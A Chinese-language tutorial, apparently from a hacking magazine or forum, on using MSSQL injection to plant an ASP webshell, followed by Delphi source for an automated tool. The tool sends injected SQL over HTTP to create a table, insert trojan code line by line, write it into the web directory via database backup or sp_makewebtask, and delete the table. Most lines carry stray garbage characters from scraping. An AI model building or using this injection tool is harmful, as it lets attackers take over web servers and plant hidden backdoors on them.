SQL注入得到WEBSHELL

韩冰

<>一．通过SQL注入得到WEBSHELL的原理:
N.E.V.E.R的方法：利用数据库备份得到WEBSHELL。创建一个表，在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来，最后再删除新建的表。
分析: N.E.V.E.R利用了MSSQL的备份数据库功能。把数据导出来，设想数据库中有&lt;%%&gt;之类的ASP标实符，导出文件，文件名以.ASP的形式保存。然后文件又保存在WEB的路径下。那么这个导出的ASP文件是不是要去解释&lt;%%&gt; 之内的语句呢？如果数据库中有的表中有&lt;%%&gt;标实符，并且这之中有错误，那么我们导出来生成的ASP文件也会有误。不过，这种机会也不太大。
4 J+ K4 o7 g7 L" X2 b再来看看CZY的方法吧。
CZY的方法：前面的和N.E.V.E.R的方法基本上差不多。只是后面用到了扩展存储过程——sp_makewebtask。这个扩展存储过程的作用就是：可以把MSSQL数据库中的某个表中的记录导出来，以文件的方法保存起来。这种方法就不会出现什么问题原因在于：我们只去读表中的某个字段中的值。把字段的信息导出来生成文件。这个字段中的值都是我们刚加上的。自己在加入数据的时候，先调试一下，没有问题在加入进去，导出来就当然没有问题了。
& i  b! M+ V8 W; d4 r9 k4 b以上两位的方法，我都手工测试过。利用SQL注入漏洞，建表，向表中加数据，然后再导出数据，再删除表。都是利用的SQL语句。这里我就不多说了，大家可以看本期的文章。
6 [- e( p1 D$ }8 F二．利用DELPHI去实现功能的前言
! T/ m0 [' r  n$ ^原理都分析过了。我们怎么利用DELPHI来实现他们的手工操作呢？其实方法是非常简单的。DELPHI提供了一个NMHTTP控件。我们利用这个控件就可以向某个特定的URL提交参数。然后实现我们的自动注射功能。我马上要为大家讲解的这个程序，有一个特点。也可以说成是一个缺陷吧。程序不去自动猜解WEB的绝对路径。程序不去判断当前连接SQL数据库的当前账号的权限。我为什么要这么做？因为得到这两者用SQL注入是非常难得到的。所以，我们程序发送命令就不会考虑太多。成不成功你执行完自己去看看生成没有就OK了。
" ~6 \: @; D+ ]& c
三．如何利用DELPHI得到WEBSHELL。
1 |6 F# B) J1 [) g$ L$ g程序中用到的值。我们这里来看看有哪些：URL路径，远程WEB绝对路径(通过其他方法得到,你一定有办法的) 采用什么方法去得到WEBSHELL(也就是两位的方法，你选哪一种)。我们同时要求点击一个按纽开始执行命令，和点击一个按纽来终止命今。最后就是新建的表的名称，以及表的字段名称，再次就是字段的类型。前面的我们在程序中放上输入，选择之类的控件就行了。后面的我们设一个选项按纽点按纽弹出相应设置。再把这些相应的设置用一个RECORD来保存。
' _- z% S! s7 e/ o0 m首先，我们在DIT控件。名称分别是：UrlET //URL路径的输入框、ShellPathET //远程木马的位置、CustomBdoorET//自定义木马的位置。再放两个RadioButton用来选择采用什么方式获取WEBSHELL。CAPTION分别取名为： BackUP DataBase 和 WEB作业。然后再放三个SpeedButtion按纽。名称分别是：设置，开始，停止, 最后再放一个MEMO控件。来显示当前添加的信息。到此界面上的工作就做完了。界面如图：
8 {3 a) D; D8 u4 v5 X
7 H$ e- z9 F3 A: g& \8 X

现在来写程序了。
0 D) T9 T9 f* ~& n( @) ^, n我们首先定义一个RECORD。
如下：
# l7 h+ n( [0 l4 _/ NType
SetOption = Record
, }/ E( \# M0 _* F4 lTableName : String; //用来保存要创建的表名.
" u1 d3 J# `' H; p# ?3 eFieldName : String; //用来保存要创建的字段名.
FiledType : String; //用来保存创建的字段名类型.
End;
FiledType字段类型的值是以下类型的一种：
Bigint binary bit char datetime decimal float image int money nchar ntext numeric nvarchar real smalldatetime smallint
+ b+ w5 u, {$ d5 H; ]; Y. o3 FSmallmoney sql_variant text timestamp tinyint uniqueidentifier varbinary varchar 这些都是MSSQL字段类型值.
2 B; w& O) k  E7 G2 L再定义一个全局变量：
Var
) C+ i- S/ s2 ?! V' zISStop : Boolean; //用来判断用户是否按下了停止按纽.
好了。在表单创建的过程中，我们为RECORD记录输入默认值.
* Q0 E! p- X, ?代码如下：
procedure TMainForm.FormCreate(Sender: TObject);
begin
2 j( e0 O# C( u; u# o- I" b/ qsOption.TableName :='cyfd'
sOption.FieldName :='gmemo'
sOption.FiledType :='text'
/ W3 Y0 G1 @1 m: X$ m; f( Mend;
现在我们添加开始执行命令的代码。
0 _0 h+ D" t% ?) r% w先定义BDoorList 为TstringList。主要目的就是把木马的内容加进来.
( ]0 f! [1 C* o: n( h创建两个变量来保存urlET.和ShellPathET的值.方便程序简化调用.
在程序开始执行前,我们得先检查一下用户的输入
8 h( y# a+ w$ D3 p* L. s# v( y定义一个Checkinput函数.
如下：
9 I' {3 {2 `# A: t1 g7 EFunction CheckInput : Boolean;
9 U4 D8 b8 `+ ^! B8 r  q$ @3 YBegin
Result := False;
if Trim(urlet.Text) = '' then
Begin
; J! x6 z* @2 u0 D8 wApplication.MessageBox('请输入URL地址!','提示',mb_ok+mb_iconinformation);
0 ~: y1 n1 E+ A5 C! BExit;
End;
if Trim(ShellPathET.Text) = '' then
& P' g3 K" T* c3 X1 GBegin
& F% t4 C, W0 Z$ k/ E" ]; Z( YApplication.MessageBox('请输入文件保存地址!','提示',mb_ok+mb_iconinformation);
4 Y4 w- r( m5 r( d  Z4 f6 K6 n/ zExit;
1 \! @! O$ i/ W( R) @End;
# o/ x5 i# \5 h: ~: yIF DefBDoor.Checked then
% x, F( r* s2 l9 RBegin
7 \- {# g* q! R9 m' |3 h0 zif Not FileExists(extractfilepath(Application.ExeName)+'默认木马.txt') then
& X# @* B: z8 j0 r& S" Z8 eBegin
Application.MessageBox('没有找到 [默认木马.txt] 文件!','提示',mb_ok+mb_iconinformation);
: J% J- c; {2 P2 h+ x% p2 s0 LExit;
0 a+ d6 c2 L( l6 o9 {' IEnd;
9 b% Z+ O! m- l/ r1 N7 F( x, REnd
; _: l: a% x4 |; T7 QElse
if Not FileExists(CustomBdoorET.Text) then
, [2 V0 K0 ?+ A% R' nBegin
- P# C  S- z" T' O1 P3 NApplication.MessageBox('没有找到所选的木马文件!','提示',mb_ok+mb_iconinformation);
Exit;
End;
& B$ d& d8 y* pResult := True;
End;
在最开始加入:
IF Not CheckInput then Exit; //如果输入不合法就退出过程.
& B: E* A- o# R9 |0 U6 Y好了，如果用户输入没什么错，我们就来下面的代码。
首先我们把IsStop设为假。创建BdoorList。
6 q4 R+ U4 p/ J) O: x! SBDoorList := TstringList.Create;
再加木马内容到BDoorlist.
% ?/ n! r( X, i; rBDoorList.LoadFromFile(CustomBdoorET.text);
+ v( V. j% [8 y$ v, u好了,在这里我还要给大家说一下：用NMHTTP提交数据的时候.要把输入的一些特别符号转达成编码。我们这里要把空格和%符号替换成相应的编码分别是:%20和%25，不然.程序加不进数据。
4 D6 J( i3 _8 {  l+ {代码如下：
5 u3 b! g, ]# Q. v3 KBDoorList.Text:=StringReplace(BDoorList.Text,'%','%25',[rfReplaceAll]);
BDoorList.Text:=StringReplace(BDoorList.Text,' ','%20',[rfReplaceAll]);
; |. ?4 R& c& g9 t2 z接下来.我们就提交建表的功能了.
, u* s, N% ^: M* c& q9 XMemo.Lines.Add('建表...');
) ?* `  ]3 _* |! ~" LMemo.Lines.Add(''); NMHttp.Get(Url+'CREATE%20TABLE%20[dbo].['+sOption.TableName+']%20(['+sOption.FieldName+']%20['+sOption.FiledType+']);');
5 E6 P* X) L, }) x% F. @3 I这样我们就创建了一个表。然后.我们向表中加记录:
代码如下:
2 J/ y; H( p8 v8 j$ V& M$ XMemo.Lines.Add('加数据...');
Memo.Lines.Add('');
For i:=0 to BDoorList.Count-1 do //这里用一个循环把木马的内容加进表中去.
Begin
IF IsStop then //这里如果点了停止按纽程序将终止任务.
Begin
BDoorList.Free;
4 \! n  `! r' D3 D6 GExit;
, E0 k4 b) C1 L* P' W& U; C$ nEnd; NMhttp.Get(Url+'Insert%20into%20'+sOption.TableName+'%20('+sOption.FieldName+')%20values%20('''+BDoorList.Strings+''');');
* i$ g7 _' L3 o" r% I7 j8 F6 i6 X6 QMemo.Lines.Add('Add Line '+Inttostr(i+1));
& y, K+ M4 K  w8 Z, [/ z# BEnd;
现在就是导出数据生成木马了.
Memo.Lines.Add('导出数据...');
Memo.Lines.Add('');
6 ?  {  F9 L& v3 ]. ~8 sIF BKData.Checked then //如果选中采用备份数据就执行下面的命令.
& z+ J% V) v4 }NMhttp.Get(Url+'declare%20@a%20sysname;select%20@a=db_name();backup%20database%20@a%20to%20disk='''+ShellPath+'''')
& r" u/ M; y% T  pElse //如果是用WEB作业的形式. NMhttp.Get(Url+'EXECUTE%20sp_makewebtask%20@outputfile='''+ShellPath+''',@query='''+'select%20'+sOption.FieldName+'%20from%20'+sOption.TableName+'''');
我们再删除刚建的表。NMHttp.Get(Url+'drop%20TABLE%20[dbo].['+sOption.TableName+'];');
; X0 }: S# e/ Z$ l& r- n) j这样我们的任务就完成了。下面来释放变量.
BDoorList.Free;
! i0 U+ Y/ t& l9 y$ m$ ]再来向停止按纽中添加点击事件：
一行代码就行了：IsStop := True;
' j2 d; |0 |8 a% A6 v1 M' d到这里主表单的内容基本上完成了。现在我们来看设置表单中怎么来设置.其实非常简单.主表单中已经定义了一个RECORD.我们只需要将用户输入的新值，再次赋给RECORD就行了。
0 h  Y" F% ~: P! s9 k设置表单中先引用主表单.然后在界面中添加二个EDIT控件：
第一个名称为：TableNameET //保用户输入的存临时表
第二个名称为：FieldNameET //用来保存用户输入的字段名.
( t3 W( ^) y: b' i( p. [# z! D再添加一个Combobox　//用来保存用户所选的字段类型值.
名称：FieldTypeCombox
( o' {' {: s7 |" w$ LOK.界面如下：
( [; |/ c" `/ ~3 X$ j6 g! F* `7 y/ L
" P2 T7 P5 b; n% ^. J, ?代码如下:
5 B8 }/ @* `8 I7 [! i定义一个过程,主表单好调用这个设置。
Procedure ShowSet;
Begin
Application.CreateForm(TSetForm,SetForm);
- r6 E& x! v" |, e$ NWith SetForm do
Begin
TableNameET.Text := sOption.TableName;
: x% c" R. A2 a7 M2 C  GFieldNameET.Text := sOption.FieldName;
7 j! a. [2 E6 E: Z8 |* BFieldTypeCombox.ItemIndex := FieldTypeCombox.Items.IndexOf(sOption.FiledType);
End;
SetForm.ShowModal;
SetForm.Free;
* v/ i5 Z  O+ W! _1 IEnd;
3 |/ a  C9 s/ B6 W; K在主表单中设置的点击事件中添加上showset过程就行了。
下面就是点击确定的代码了。
IF CheckInput then
# r2 N3 p, q/ J, b. {1 ]& F6 _Begin
sOption.TableName := Trim(TableNameET.Text); //把用户的输入赋给RECORD.
sOption.FieldName := Trim(FieldNameET.Text);
sOption.FiledType := FieldTypeCombox.Text;
Close;
" ~8 J3 z2 l# M! O) IEnd;
2 j5 I4 k7 N4 z$ d" V0 U1 V# _这里又有一个CheckInput主要就是检查用户输入的值是不是合法。
7 v, g* o, ]- U代码如下:
- r( l$ A9 }1 V) hFunction CheckInput : Boolean;
6 z5 L1 e/ U0 A% gBegin
2 E9 q! H0 g" _" `( e: R2 p" @" DResult := False;
IF Trim(TableNameET.Text)='' then
Begin
Application.MessageBox('请输入临时表名!','提示',mb_ok+mb_iconinformation);
Exit;
End;
* L3 v/ Y2 o8 L  ?IF Trim(FieldNameET.Text)='' then
Begin
1 V8 ?0 z9 ~" W. vApplication.MessageBox('请输入字段名!','提示',mb_ok+mb_iconinformation);
Exit;
End;
Result := True;
End;
& _( y% }; b3 A' W& }( ^到这里程序就完了。</P>